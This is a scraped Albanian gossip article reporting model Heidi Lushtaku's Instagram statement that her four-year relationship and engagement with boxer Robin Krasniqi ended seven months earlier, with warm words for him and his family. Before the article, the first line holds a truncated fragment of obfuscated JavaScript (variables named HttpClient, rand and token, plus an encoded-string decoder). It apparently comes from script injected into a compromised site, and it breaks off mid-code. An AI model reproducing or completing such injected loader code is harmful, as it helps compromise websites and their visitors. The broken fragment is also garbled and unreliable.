;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Heidi Lushtaku thyen heshtjen e saj për ndarjen nga Robin Krasniqi

By

Që nga viti i kaluar është përfolur për ndarjen e bokserit Robin Kransniqi dhe modeles Heidi Lushtaku.

Shenjat e para që ngritën dyshimet ishin postimet e fshira nga rrjetet e tyre sociale ku shumë shpesh i shihnim bashkë.

Kurse gjatë ditës së sotme, me një shkrim të gjatë në llogarinë e saj në Instagram, modelja sqaroi gjithçka për lidhjen e saj me Robinin.

“Përshëndetje të gjithë përkrahësve dhe kureshtarëve. Pavarësisht që ka bërë jehonë ndarja ime me Robinin, asnjëherë s’kam dashur të flas publikisht, madje për hir të kësaj i kam evituar edhe intervistat, por, ngase është e pamundur t’i rezistojmë kureshtjes së mediave dhe fansave, nga ky çast deklaroj që statusi emocional i lidhjes sonë ka ndryshuar dhe tani jemi të pozicionuar karshi njëri-tjetrit si miq të denjë. Ndarjet janë të vështira dhe aspak të këndshme sidomos pas një periudhe afërsisht katër vjeçare, të cilën e kemi të mbushur me përjetime të këndshme dhe të hareshme, por nga pamundësia që ta ruajmë këtë harmoni, ekuilibër dhe përkushtim ndaj njëri-tjetrit në vijim, ne kemi vendosur para shtatë muajsh t’i japim fund fejesës sonë. Kur e shfletoj këtë eksperiencë jetësore më rrezaton përplotë emocione dhe ndjenja të natyrave të ndryshme, prandaj dua të arkivoj kujtesën time si një përjetim dhe mësim të vyeshëm që na dhuroi jeta, dhe asnjëherë si një kohë që duhet ta gjykoj me pendesë. Prandaj unë vazhdoj ta çmoj si një mik Robinit, e sidomos familjen e tij, e në veçanti nënën e tij, e cila më trajtoi sikurse vajzën e vet, dhe si e tillë duhet të shërbejë si model pozitiv për të gjitha vjehrrat shqiptare. Këtë shkrim dëshiroj ta përfundoj duke i uruar përzemërsisht Robinit shumë sukses në pasionin e tij dhe realizim të të gjitha synimeve jetësore! Me dashuri, Heidi” – shkruan modelja.

View this post on Instagram

🌹

A post shared by Heidi Lushtaku (@heidilushtaku_) on

Artikuj të ngjashëm